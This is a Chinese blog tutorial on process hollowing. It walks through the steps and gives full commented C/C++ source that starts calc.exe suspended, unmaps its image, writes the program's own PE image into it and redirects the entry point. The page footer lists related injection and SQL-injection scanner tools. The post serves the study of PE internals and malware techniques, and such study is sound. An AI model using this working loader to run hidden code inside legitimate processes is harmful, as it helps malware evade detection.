EXE注入分析之傀儡进程

最新推荐文章于 2024-06-21 07:00:00 发布
最新推荐文章于 2024-06-21 07:00:00 发布
阅读量3.3k 收藏 9
点赞数
分类专栏: C/C++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cool_sec/article/details/18320345
版权

最近学习PE结构,顺便看到了一篇WIN32 EXE注入的文章,代码是04年的,比较古老了,

但是代码写的很好,受益匪浅,然后在百度很少找到翻译的比较清楚的文章,这篇我在代码中加了中文注释,

方便菜鸟理解,阅读这篇帖子需要熟悉PE结构,如果你不懂PE结构建议你先去学习下,

说错的地方请各位大神指正,板砖吐口水都可以。


--- 我是淫荡的分割线---


提到傀儡进程,首先想到的就是黑客所使用的后门程序了,首先使用CreateProcess传入CREATE_SUSPENDED

创建一个挂起的进程,以下称为傀儡进程,然后使用GetThreadContext读取傀儡进程的上下文信息,通过DWORD

指针指向CONTEXT的EBX,DWORD + 8 字节可以读取到傀儡进程的基地址,然后计算傀儡进程的镜像大小

然后把自己的数据读入到傀儡进程内,设置CONTEXT上下文入口点信息EAX,并恢复进程主线程。说白了就是使用

傀儡进程的外壳来执行自身的恶意代码。


下面使用步骤详细说明下,然后对照源代码看比较清楚些!

 注意:程序默认注入的进程为计算器 傀儡进程为A进程,自身进程为B文件

 当然这样说比较蛋疼,因为他是从你命令里面读取其他文件信息来注入到傀儡进程的,

这里我就把自身进程当作B进程,不从控制台接收exe信息,直接使用GetModuleFileName

函数来获取自身,这样方便理解!


1、使用fopen来读取B文件,返回FILE指针

2、使用c语言函数读取B文件的DOS FILE OPTIONAL SECTION等数据结构信息

3、获取B文件载入内存所需要的镜像大小 模除取余

4、使用VirtualAlloc申请B文件镜像大小初始化为0内存空间

5、把B文件读入到申请的内存空间中,并指针后移 [因为需要内存对齐]

6、使用CreateProcess创建一个挂起的傀儡进程并获取CONTEXT线程上下文信息

7、使用DWORD 指针指向CONTEXT->EBX,此时指针 + 8字节指向傀儡进程基址

8、使用VirtualQueryEx MEMORY_BASIC_INFORMATION结构来获取从傀儡进程基址 到末尾 得到傀儡进程镜像大小

9、如果傀儡进程的镜像大小 大于或等于 B进程的,并且他们的基地址相同,那么使用VirtualProtectEx设置从基地址到镜像大小这块内存为可读可写

10、否则需要卸载傀儡进程内存空间的数据,传入的参数为傀儡进程基址与镜像大小并在傀儡进程重新申请B进程镜像大小的内存空间

11、把在傀儡进程中重新申请的内存空间地址,写入到傀儡进程的基地址【重要】

12、把B文件已经读取到内存的数据,写入到傀儡进程中

13、设置傀儡进程的EAX指向B进程已经覆盖过数据的入口点

14、设置傀儡进程的线程上下文信息

15、ResumeThread恢复傀儡进程的主线程,以此达到使用傀儡进程的外壳来执行自身恶意代码的行为


注:其实这里面省略了一个步骤,那就是步骤10往后的一个地方,说ZwUnmapViewOfSection卸载失败以后

可能是存在重定位信息,但是EXE一般不会有重定位信息,因为exe首先被加载到属于自己的虚拟4GB空间,

然后他的判断是检测IMAGE_OPTIONAL_HEADER的IMAGE_DATA_DIRECTORY成员变量,这个是一个数据结构

索引为5的地方是重定位信息,判断他的地址与大小是否为0,来决定是否需要重定位信息。


以下代码我加了中文注释,并把原先的代码重新写了一遍,也方便自己来理解作者为何要这么写。

// H文件
#define dosHdrlen      sizeof(IMAGE_DOS_HEADER)
#define ntHdrslen      sizeof(IMAGE_NT_HEADERS)
#define fileHdrlen     sizeof(IMAGE_FILE_HEADER)
#define optionHdrlen   sizeof(IMAGE_OPTIONAL_HEADER)
#define sectionHdrlen  sizeof(IMAGE_SECTION_HEADER)

typedef struct _PROCINFO 
{
	unsigned long ulBaseAddr;
	unsigned long ulImageSize;
}PROCINFO, *PPROCINFO;

int  RunInjectProcess();
int  getAlignedSize(unsigned long curSize, unsigned long alignment);
int  calctotalImageSize(PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER sectionHdr);
bool readPEInfo(FILE *fp, PIMAGE_DOS_HEADER dosHdr, PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER *sectionHdr);
bool loadPE(FILE *fp, void *lptrloc, PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER sectionHdr);


void doFork(void *lptrloc, int ImageSize, PIMAGE_DOS_HEADER dosHdr, PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER sectionHdr);
bool createProcInfo(PPROCESS_INFORMATION pi, PCONTEXT pthreadcxt, PPROCINFO outPorceInfo);
bool unloadImage(HANDLE hProcess, unsigned long ulBaseAddr);

int RunInjectProcess()
{
	char szInject[MAX_PATH];
	GetModuleFileNameA(NULL, szInject, MAX_PATH);
	if (strstr(szInject, "calc.exe") != 0)
		return 0;

	FILE *fp;
	fopen_s(&fp, szInject, "rb");  // 文件指针

	if (fp)
	{
		IMAGE_DOS_HEADER      dosHdr;
		IMAGE_FILE_HEADER     fileHdr;
		IMAGE_OPTIONAL_HEADER optionHdr;
		PIMAGE_SECTION_HEADER sectionHdr;

		// 读取文件PE数据结构
		if (readPEInfo(fp, &dosHdr, &fileHdr, &optionHdr, §ionHdr))
		{
			// 计算PE文件镜像大小
			int  ImageSize = calctotalImageSize(&fileHdr, &optionHdr, sectionHdr);
			// 申请内存空间 大小为自身的ImageSize 初始化为0并可读可写
			void *lptrloc = VirtualAlloc(NULL, ImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
			if (lptrloc)
			{
				// 载入自身到内存空间
				loadPE(fp, lptrloc, &fileHdr, &optionHdr, sectionHdr);

				// 创建傀儡进程
				doFork(lptrloc, ImageSize, &dosHdr, &fileHdr, &optionHdr, sectionHdr);
			}
			else
				return false;
		}
	}
	else
		return 1;

	return 0;
}

bool readPEInfo(FILE *fp, PIMAGE_DOS_HEADER dosHdr, PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER *sectionHdr)
{
	// 偏移指向文件末尾
	fseek(fp, 0, SEEK_END);
	long uFileSize = ftell(fp); // 获取文件大小
	fseek(fp, 0, SEEK_SET);     // 指向文件头

	// 判断文件是否小于DOS头+NT头结构
	if (uFileSize < (dosHdrlen + ntHdrslen))
	{
		printf("file size too small.\n");
		return false;
	}

	// 读取DOS头数据结构并校验MZ签名
	fread(dosHdr, dosHdrlen, 1, fp);
	if (dosHdr->e_magic != 0x5a4d)
	{
		printf("the file not MZ signature.\n");
		return false;
	}

	// 偏移指向 dosHdr->e_lfanew 校验PE00签名
	unsigned long uPE00 = 0;
	fseek(fp, dosHdr->e_lfanew, SEEK_SET);
	fread(&uPE00, sizeof(unsigned long), 1, fp);
	if (uPE00 != IMAGE_NT_SIGNATURE)
	{
		printf("the file not pe00 signature.\n");
		return false;
	}

	// 读取FILE数据结构信息
	fread(fileHdr, fileHdrlen, 1, fp);
	if (fileHdr->SizeOfOptionalHeader != optionHdrlen)
	{
		printf("unexpected win32 pe file.\n");
		return false;
	}

	// 读取OPTIONAL可选头信息 
	fread(optionHdr, optionHdrlen, 1, fp);

	// 校验WIN32或者WIN64应用程序
	if (optionHdr->Magic != 0x10b && optionHdr->Magic != 0x20b)
	{
		printf("the fuck not win32 or win64 pe file.\n");
		return false;
	}

	// 读取节表信息[区段表],总数为file-numberofsection中指定
	// 申请内存读取节表信息

	*sectionHdr = new IMAGE_SECTION_HEADER[fileHdr->NumberOfSections];
	if (*sectionHdr)
	{
		memset(*sectionHdr, 0, sectionHdrlen * fileHdr->NumberOfSections);
		fread(*sectionHdr, sectionHdrlen * fileHdr->NumberOfSections, 1, fp);
	}
	else 
		return false;

	return true;
}

int calctotalImageSize(PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER sectionHdr)
{
	int nRetval = 0;

	// 获取PE文件在内存中所需要的对齐值 WIN32 为4096字节
	int alignment = optionHdr->SectionAlignment;

	// 判断 DOS + NT + SECTION表的大小
	// 总大小取余内存对齐值 如果为0则说明已经对齐
	// 否则总大小除以内存对齐值 然后++之后乘以内存页对齐值

	if (optionHdr->SizeOfHeaders % alignment == 0)
		nRetval += optionHdr->SizeOfHeaders;
	else
	{
		int val = optionHdr->SizeOfHeaders / alignment;
		val ++;
		nRetval += (val * alignment);
	}

	// for循环来处理每个区段在内存中所占的内存大小
	for (short i = 0; i < fileHdr->NumberOfSections; i++)
	{
		if (sectionHdr[i].Misc.VirtualSize)
		{
			if (sectionHdr[i].Misc.VirtualSize % alignment == 0)
				nRetval += sectionHdr[i].Misc.VirtualSize;
			else
			{
				int val = sectionHdr[i].Misc.VirtualSize / alignment;
				val ++;
				nRetval += (val * alignment);
			}
		}
	}

	return nRetval;
}

int getAlignedSize(unsigned long curSize, unsigned long alignment)
{	
	if(curSize % alignment == 0)
		return curSize;
	else
	{
		int val = curSize / alignment;
		val ++;
		return (val * alignment);
	}
}

bool loadPE(FILE *fp, void *lptrloc, PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER sectionHdr)
{
	// 指针指向PE偏移0字节
	fseek(fp, 0, SEEK_SET);
	char *outPtr = (char *)lptrloc; // 强制转换指针

	unsigned long i;
	unsigned long headerSize = optionHdr->SizeOfHeaders; // 读取头数据大小

	// UPX压缩以后节表的首个指向原始数据的长度为0
	// 主要是为了读取整个头大小来查找偏移地址的
	for (i = 0; i < fileHdr->NumberOfSections; i++)
	{
		if (sectionHdr[i].PointerToRawData < headerSize)
			if (sectionHdr[i].PointerToRawData > 0)
				headerSize = sectionHdr[i].PointerToRawData;
	}

	// 读取PE头数据到申请的内存空间中
	unsigned long readSize = fread(outPtr, 1, headerSize, fp);
	if (readSize != headerSize)
	{
		printf("read header outPtr error.\n");
		return false;
	}

	// for循环读取节表到内存空间中
	// 因为需要内存对齐,所以内存指针需要后移内存页倍数的值

	outPtr += getAlignedSize(optionHdr->SizeOfHeaders, optionHdr->SectionAlignment);

	// 读取节表数据到内存空间
	for (i = 0; i < fileHdr->NumberOfSections; i++)
	{
		//printf("sectionHdr[i].SizeOfRawData %d\n",sectionHdr[i].SizeOfRawData);
		//printf("sectionHdr[i].VirtualSize %d\n",sectionHdr[i].Misc.VirtualSize);
		//printf("sectionHdr[i].PointerToRawData %d\n",sectionHdr[i].PointerToRawData);
		//putchar('\n');
		if (sectionHdr[i].SizeOfRawData > 0) 
		{
			unsigned long toRead = sectionHdr[i].SizeOfRawData;
			if (toRead > sectionHdr[i].Misc.VirtualSize)  
				toRead = sectionHdr[i].Misc.VirtualSize;

			// 设置PE在磁盘中的数据偏移地址
			fseek(fp, sectionHdr[i].PointerToRawData, SEEK_SET);
			readSize = fread(outPtr, 1, toRead, fp);

			if(readSize != toRead)
			{
				printf("reading section error %d.\n", i);
				return false;
			}

			// 指针后移内存对齐的倍数
			outPtr += getAlignedSize(sectionHdr[i].Misc.VirtualSize, optionHdr->SectionAlignment);
		}
		else
		{
			// UPX压缩以后的第一个节 如UPX0节的大小是为0
			// 所以直接后移内存对齐字节的倍数

			if(sectionHdr[i].Misc.VirtualSize)
				outPtr += getAlignedSize(sectionHdr[i].Misc.VirtualSize, optionHdr->SectionAlignment);
		}
	}

	return true;
}

void doFork(void *lptrloc, int ImageSize, PIMAGE_DOS_HEADER dosHdr, PIMAGE_FILE_HEADER fileHdr, PIMAGE_OPTIONAL_HEADER optionHdr, PIMAGE_SECTION_HEADER sectionHdr)
{
	CONTEXT      threadCxt; // 线程上下文
	PROCINFO     proceInfo; // 傀儡进程基址与镜像大小
	PROCESS_INFORMATION pi; // 进程参数

	// 创建傀儡进程并取得基址与镜像大小
	if (createProcInfo(&pi, &threadCxt, &proceInfo))
	{
		void *pBaseAddr = NULL; // 内存指针

		// 如果傀儡进程与自身进程基址相等 并且傀儡进程镜像大小大于等于自身
		// 则设置这块内存为可读可写属性
		if (optionHdr->ImageBase == proceInfo.ulBaseAddr && ImageSize <= (int)proceInfo.ulImageSize)
		{
			pBaseAddr = (void*)proceInfo.ulBaseAddr;
			VirtualProtectEx(pi.hProcess, (void*)proceInfo.ulBaseAddr, proceInfo.ulImageSize, PAGE_EXECUTE_READWRITE, NULL);
		}
		else
		{
			// 否则卸载傀儡进程的内存数据
			if (unloadImage(pi.hProcess, proceInfo.ulBaseAddr))
			{
				// 在傀儡进程中重新申请内存空间,从自身的镜像基址开始申请,大小为自身的镜像大小 属性可读可写
				pBaseAddr = VirtualAllocEx(pi.hProcess, (void*)optionHdr->ImageBase, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
				if (pBaseAddr)
				{
					printf("mem for new exe %x\n",(unsigned long)pBaseAddr);
				}
			}
		}

		// 这里原先是一个重定位操作,由于EXE不需要重定位操作 故此忽略

		if (pBaseAddr)
		{
			// 把重新申请的空间地址写入到傀儡进程基址
			unsigned long ulWritten;
			unsigned long *ulPEBInfo = (unsigned long*)threadCxt.Ebx;
			WriteProcessMemory(pi.hProcess, &ulPEBInfo[2], &pBaseAddr, sizeof(void*), &ulWritten);

			// 把自身的数据写入到傀儡进程中
			if(WriteProcessMemory(pi.hProcess, pBaseAddr, (LPCVOID)lptrloc, ImageSize, &ulWritten))
			{
				// 设置上下文信息
				threadCxt.ContextFlags = CONTEXT_FULL;

				// 如果申请的基地址 等于原来傀儡进程的基地址 则从自身的0x0040000处 + 入口点地址
				// 否则从申请的内存数据地址 + 入口点地址 为RVA 
				if ((unsigned long)pBaseAddr == proceInfo.ulBaseAddr)
				{
					threadCxt.Eax = optionHdr->ImageBase + optionHdr->AddressOfEntryPoint;
				}
				else
				{
					threadCxt.Eax = (unsigned long)pBaseAddr + optionHdr->AddressOfEntryPoint;
				}

				// 设置傀儡进程的线程上下文信息
				SetThreadContext(pi.hThread, &threadCxt);
				
				// 恢复主线程执行
				ResumeThread(pi.hThread);
			}
		}
	}
	else
	{
		printf("create puppet process failure %d\n", GetLastError());
	}
}

#define TPROCEXE  _T("c:\\windows\\system32\\calc.exe")

//************************************************************************
// 
// lkd> dt_peb
// nt!_PEB
// +0x000 InheritedAddressSpace    : UChar
// +0x001 ReadImageFileExecOptions : UChar
// +0x002 BeingDebugged            : UChar
// +0x003 BitField                 : UChar
// +0x003 ImageUsesLargePages      : Pos 0, 1 Bit
// +0x003 SpareBits                : Pos 1, 7 Bits
// +0x004 Mutant                   : Ptr32 Void
// +0x008 ImageBaseAddress         : Ptr32 Void *这里是PEB结构 + 8 字节的地方
//
//************************************************************************

bool createProcInfo(PPROCESS_INFORMATION pi, PCONTEXT pthreadcxt, PPROCINFO outPorceInfo)
{
	STARTUPINFO si = {0};
	si.cb = sizeof(si); // 初始化SI结构大小

	// 创建挂起的傀儡进程
	if (CreateProcess(TPROCEXE, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, pi))
	{
		// 获取线程CONTEXT上下文信息
		pthreadcxt->ContextFlags = CONTEXT_FULL;
		GetThreadContext(pi->hThread, pthreadcxt);

		// 从傀儡进程句柄 PEB结构 + 8 字节获取进程加载基址
		unsigned long *ulPebInfo = (unsigned long *)pthreadcxt->Ebx;
		ReadProcessMemory(pi->hProcess,	&ulPebInfo[2], (void*)&(outPorceInfo->ulBaseAddr), sizeof(u_long), NULL);
		
		// 临时变量用来计算镜像大小
		unsigned long ulmemAddr = outPorceInfo->ulBaseAddr;

		MEMORY_BASIC_INFORMATION memInfo;
		memset(&memInfo,0,sizeof(memInfo));

		// 从进程的EBX+8开始读取镜像基址
		// memInfo->BaseAddress指向ulBaseAddr下一个边界
		// memInfo->RegionSize指向内存块的大小从BaseAddress开始计算
		// memInfo->State页面空闲状态MEM_FREE
		// 从进程加载的基地址空间来读取内存页的状态
		// 起始进程地址 + 每个页面的大小 

		while (VirtualQueryEx(pi->hProcess, (void*)ulmemAddr, &memInfo, sizeof(memInfo)))
		{
			if (memInfo.State == MEM_FREE)
				break;
			ulmemAddr += memInfo.RegionSize;
		}

		// 末尾大小减去起始地址 等于EXE加载到进程地址空间中的镜像大小
		// 进程挂起状态下的
		outPorceInfo->ulImageSize = ulmemAddr - outPorceInfo->ulBaseAddr;
		printf("poutPorcInfo->ulImageSizex %d.\n",outPorceInfo->ulImageSize);
	}
	else
		return false;

	return true;
}

bool unloadImage(HANDLE hProcess, unsigned long ulBaseAddr)
{
	typedef unsigned long (__stdcall *PTRZwUnmapViewOfSection) (HANDLE, void*);
	PTRZwUnmapViewOfSection ZwUnmapViewOfSection = NULL;

	HMODULE hInst = LoadLibrary(_T("ntdll.dll"));
	if (hInst)
	{
		ZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(hInst, "ZwUnmapViewOfSection");
		if (ZwUnmapViewOfSection)
		{
			ZwUnmapViewOfSection(hProcess, (void*)&ulBaseAddr);
		}

		FreeLibrary(hInst);
		return true;
	}

	return false;
}


酷酷的鱼
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
傀儡进程注入
qq_40710190的博客
05-08 956
傀儡进程注入 这个注入之所以叫傀儡进程注入是因为其做法是先创建一个A进程,然后将其内存替换成要执行的代码,而从外部来看就是最初创建的A进程。 从我的视角来看跟PE文件注入还蛮像的,不同点在于PE文件注入是将代码注入进去后修改EntryPoint引导至注入的代码,而傀儡进程注入则更加简单暴力一些😋,把所有内存替换了。 多亏了之前的一些PE基础因此没有特别费劲PE文件头格式解析 本章详细讲解m0n0ph1的源码 创建傀儡进程 根据一开始所说,我们需要创建一个进程 printf("Creating process
傀儡进程
tony的专栏
10-25 1253
#include "stdafx.h"#include windows.h>typedef long NTSTATUS;typedef NTSTATUS (__stdcall *pfnZwUnmapViewOfSection)(        IN HANDLE ProcessHandle,        IN LPVOID BaseAddress        );BOOL CreateIEPr
傀儡进程详解
最新发布
N阶二进制的博客
06-21 503
傀儡进程是一种高级的隐蔽技术,攻击者利用进程注入进程替换和隐藏技术,伪装成合法进程进行恶意活动。理解这些技术及其防范措施对于保护系统安全至关重要。希望通过此详解和示例,大家能更好地理解傀儡进程的工作原理和防范方法。
[Rootkit] 傀儡进程
墨鱼菜鸡
08-16 152
实现原理: 以挂起的方式打开目标进程,将ShellCode代码写入目标进程,并修改目标进程的执行流程,使其转而执行ShellCode代码,这样,进程还是目标原本进程,但执行的操作却替换成我们的ShellCode了。 ...
Windows傀儡进程实现C++代码
04-28
在Windows操作系统中,傀儡进程(也称为子进程或服务进程)是指由父进程创建并控制的进程。这种控制通常包括启动、停止、监控以及与之通信等操作。本项目"Windows傀儡进程实现C++代码"是使用C++编程语言在Visual ...
傀儡注入点批量扫描工具.exe
07-29
批量扫描注入点,有Access显错扫描、Mysql显错扫描、Mssql显错扫描、And数字注入、And字符注入、Xor注入测试、Svn源代码泄露、备份扫描等多种注入方式扫描,可以批量,具体自己发挥吧
傀儡SQL批量扫描注入工具
07-14
为了防御这种攻击,以及进行安全测试,开发者和安全研究人员会使用各种工具,其中之一便是“傀儡SQL批量扫描注入工具”。 傀儡SQL批量扫描注入工具是一款专门针对SQL注入漏洞进行自动化检测的软件。它的核心功能是...
易语言注入DLL置目标进程
07-22
易语言注入DLL置目标进程源码,注入DLL置目标进程,InjectDll,SwingingWindow,CloseHandle,GetProcAddress,OpenProcess,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CopyMemory
确实可行的EXE注入
11-23
标题“确实可行的EXE注入”以及描述中提到的“木马的雏形代码,通过系统进程建立傀儡进程来隐藏自己”揭示了一个关键的网络安全技术——EXE注入。这是一种黑客常用的恶意软件策略,用于在目标系统中隐藏并执行非法或...
傀儡扫描注入
05-09
扫描注入点的一个神器............................................................................................................................................................................................................................................................................................................................................................................................................................................
傀儡SQL注入+URL采集器.zip
04-26
URL采集器,可以根据关键词采集,SQL注入器,傻瓜式找注入点,仅供学习使用,不能用于非法用途,大家可以根据需要下载
鼠标傀儡小工具
05-24
本程序适用于某些截图软件无法截取到鼠标,又或者有老花眼的,嫌鼠标太小,又或者某些远程演示看不到对方的图标操作(比如又很多人用QQ的远程协助来进行远程演示,对方看不到申请方的鼠标),就可以用本程序给鼠标添加一个傀儡身份。 本程序拥有皮肤的功能,你可以根据自己的灵感做很多漂亮的皮肤拉。 快捷键{F8}:暂停和开启傀儡鼠标 快捷键{F10}:退出程序 快捷键{F2}:按顺序更换皮肤文件夹内的皮肤 快捷键{F3}:可切换系统自身鼠标的隐藏和显示 注意:此程序属于本人玩票性质的小作品,不一定适用于所有网友的系统环境,就连我自己的系统也是不很稳定,现在已经发现的最主要的bug是::::在快速切换皮肤{F2}的时候,容易造成程序错误退出,这时候如果你之前隐藏了系统自带鼠标的话,而鼠标傀儡又错误退出,鼠标箭头没得显示的时候,那么你就没有鼠标用了!!! 解决的方法就是到控制面板里面,找到鼠标选项,更换一套鼠标主题。。或者重启系统。 还有一点就是:此程序运行起来对机器性能要求比较高,可能有一部分老爷机会很卡
关于傀儡进程的笔记
A13781798811的博客
03-12 229
最近在分析一个病毒时,病毒通过创建傀儡进程,内存映射来执行恶意代码。 但在分析的时候遇到附加后傀儡进程数据出错的问题。 百度到的常见傀儡进程流程: (1)CreateProcess一个进程,并挂起,即向dwCreationFlags参数传入CREATE_SUSPENDED; (2) GetThreadContext获取挂起进程CONTEXT,其中,EAX为进程入口点地址,EBX...
创建傀儡进程
挖树
10-14 971
折腾好久,总算完成了自己第一次的傀儡进程编写。 效果:使当前进程创建一个子进程(同名) 掏空子进程注入任何自己编写好的其他exe。 注意点 1.用来创建傀儡进程的父进程程序 需要是32位程序,因为编码的程序本身就是win32控制台程序 2.注入进程中的程序32位,64位都行 3.pe结构取值时一定一定要留心是否需要加基址。 4.注意区分CUI程序和GUI程序,如果代码编写的是32位控制台程序,...
dll注入系列——傀儡进程
40KO的博客
04-11 997
0x0介绍 之前说过,要动态注入dll文件,则需要执行程序中本身没有的加载操作,必须改变控制流,除了创建线程外,还可以劫持控制流。这与二进制漏洞利用比较类似,我们向程序写入一段shellcode,然后改变线程上下文,让其去执行shellcode,这段shellcode完成LoadLibrary的操作,就完成了dll注入傀儡进程的本质是利用其他进程空间来执行我们的写入代码,它的实现并不困难...
傀儡进程原理及调试
小黑话不多
08-11 3268
傀儡进程创建过程: (1) CreateProcess一个进程,并挂起,即向dwCreationFlags 参数传入CREATE_SUSPENDED; (2) GetThreadContext获取挂起进程CONTEXT,其中,EAX为进程入口点地址,EBX指向进程PEB; (3) ZwUnmapViewOfSection卸载挂起进程内存空间数据; (4) VirtualAllo
傀儡进程学习
0xDQ的博客
10-05 4290
0x00 前言 最近做了一道18年swpuctf的题,分析了一个病毒,正巧都用到了傀儡进程,就想着把傀儡进程学习一下。本文权当个人的学习总结了一些网上的文章,如有错误,还请路过的大佬斧正。 0x01 SWPUCTF -- GAME 进入main函数 先获取当前目录,再拼上GAME.EXE 进入sub_4011D0 首先寻找资源,做准备工作,进入sub_4012C0 1)检测PE结构 2)CreateProcessA 创建进程 3)GetThreadContext...
傀儡sql注入批量扫描工具
11-03
傀儡SQL注入批量扫描工具是一种用于检测和扫描网站是否存在傀儡SQL注入漏洞的软件工具。傀儡SQL注入是一种常见的网络安全漏洞,攻击者可以利用该漏洞来获取数据库中的敏感信息,或者更严重的情况下,完全控制受攻击的网站。 这种工具的工作原理是自动化扫描一系列的URL链接,检查这些链接是否存在傀儡SQL注入漏洞。工具会自动发送带有特殊注入代码的请求,以尝试从数据库中获取未经授权的数据。如果网站存在注入漏洞,工具将会提供相应的警报或报告。 使用傀儡SQL注入批量扫描工具的好处是可以快速发现并修复潜在的漏洞。通过自动化扫描,工具可以在短时间内检查大量的URL链接,从而节省了人工扫描的时间和精力。同时,工具还可以提供详细的报告,包括漏洞的类型、位置和可能的危害程度,帮助网站管理员更好地了解漏洞的风险,并采取相应的措施进行修复。 然而,傀儡SQL注入批量扫描工具只是发现漏洞的工具,不能替代人工的安全评估和修复过程。因此,在使用这种工具时,网站管理员仍然需要监测并验证扫描结果,确保没有误报或漏报。此外,修复漏洞也需要采取正确的措施,例如升级软件、过滤输入等,才能有效地防范傀儡SQL注入攻击。 总之,傀儡SQL注入批量扫描工具在网络安全领域发挥着重要的作用,可以帮助网站管理员快速发现和修复潜在的傀儡SQL注入漏洞,从而提高网站的安全性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值